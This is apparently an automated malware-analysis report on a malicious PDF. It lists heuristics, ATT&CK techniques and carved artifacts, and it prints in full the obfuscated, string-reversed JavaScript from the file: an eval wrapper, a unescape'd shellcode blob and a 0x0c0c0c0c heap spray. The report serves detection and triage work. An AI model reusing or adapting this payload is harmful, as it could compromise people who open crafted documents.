MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. This script, named 'javascript_obj0012_000.js', is likely designed to download and execute a second-stage payload from the embedded URL http://www.bitstream.com. The ASCIIHexDecode filter also suggests potential exploit activity within the PDF structure.
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics 5
-
ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEXHex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.bitstream.com In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0012_000.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0x104F0 | 3724 bytes |
SHA-256: 78bab42ea050c9d2a12931eade2d98c996aa7c4040b068f89e657a45642a0857 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var eva=new Function("a","ev al (a);".split("").join(""));
var s='
;"s"+dD=]M[nBR )++M;0f1x0<M;0=M( rof ;)(yarrA wen = nBR rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.Sklja = dD ;Sklja =+ Sklja )00008x0 < htgnel.Sklja(elihw ;)2/63556 ,0(gnirtsbus.VMUrM = Sklja ;Ri =+ VMUrM ;ew =+ VMUrM ;)2/)42x0-c0c0x0( ,0(gnirtsbus.Ri = VMUrM ;Ri=+Ri )63556 < 8 + 02 + htgnel.Ri( elihw ;) "c" + "0" + "c" + "0" + "u%" + "c" + "0" + "c" + "0" + "u" + "%" (ssaU = Ri rav ;) 'bb14 u % ca26 u % 2ae8 u % 407c u % b4be u % 69b1 u % 8246 u % 6990 u % 607b u % 58b5 u % ae5c u % 8bbd u % e90c u % b33c u % b683 u % 2004 u % cbaf u % e5fb u % 427a u % 6b6d u % 56d8 u % 93c9 u % ea8a u % e330 u % 5272 u % 5523 u % a170 u % 5582 u % f1e3 u % 2889 u % d305 u % 65e9 u % 532b u % 9eb3 u % 52ac u % 6020 u % c7e6 u % c5b1 u % 8552 u % 60c3 u % 77ca u % d89b u % bf09 u % a045 u % 39c8 u % dbe1 u % 0de7 u % 8674 u % 3ff7 u % a9fd u % ee7d u % c3a4 u % 514a u % 1894 u % dd75 u % e5a3 u % 99f6 u % 3522 u % 6ae5 u % b6d6 u % 54f6 u % 9bc1 u % dac6 u % c87a u % 0552 u % f53b u % 0641 u % 3dbe u % 62ce u % a7c5 u % 42cb u % d85e u % 10a7 u % dad9 u % dcde u % d6c9 u % 8bfa u % ebb6 u % fe0a u % d493 u % 6acb u % 8383 u % 6937 u % be7d u % ae96 u % 725b u % 225a u % 6907 u % 3fa8 u % d15b u % bd56 u % 687b u % 57d4 u % 56c3 u % dff1 u % 438e u % 68a4 u % 50ab u % f0fa u % 4f9d u % cef4 u % 81c8 u % 3033 u % aecf u % e038 u % 1324 u % 4fa5 u % 4742 u % ec9d u % 339d u % 9c1b u % 9113 u % 21e6 u % 8b17 u % 0070 u % f211 u % 0070 u % 137d u % 0070 u % d451 u % ff09 u % ffff u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % 0909 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % 0909 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % ff09 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % ffff u % 8e6e u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % be50 u % 57ee u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % c 0c 0 u % c 0c 0 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 18bf u % 2c40 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 4038 u % 380c u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 9881 u % b8a1 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 5185 u % a5be u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 4509 u % a509 u % 0070 u % bb51 u % 0070 u % 137d u % 0000 u % 0400 u % 0000 u % 0001 u % 1000 u % 4010 u % 0000 u % 0000 u % 1000 u % 0010 u % ffff u % ffff u % 0070 u % 45c5 u % 0070 u % 2e25 u % 1000 u % 1100 u % 0070 u % 7f27 u % 0070 u % ca8a u % 1000 u % 0010 u % 0070 u % bb51 u % 0070 u % ca8a u % 1000 u % 1100 u % 0070 u % bb51 u % 0070 u % 2bf7 u % eff7 u % 0030 u % 0070 u % bb51 u % 0070 u % d451 u % 0000 u % 0001 u % 0070 u % bb51 u % 1000 u % 4010 u % 0070 u % 7f27 u % 1000 u % 4210 u % 0070 u % 9951 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % c 0c 0 u % c 0c 0 u % 0070 u % 4809 u % 0070 u % 3309 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % cccc u % cccc u % 0070 u % f651 u % 0070 u % fe84 u % cccc u % cccc u % 0070 u % 9194 u % c 0c 0 u % c 0c 0 u % ' (ssaU = ew rav ;epacsenu = ssaU rav
';
eva(s.split("").reverse().join(""));
|
|||
font_00_sfnt_off00000319.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x319 | 65932 bytes |
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.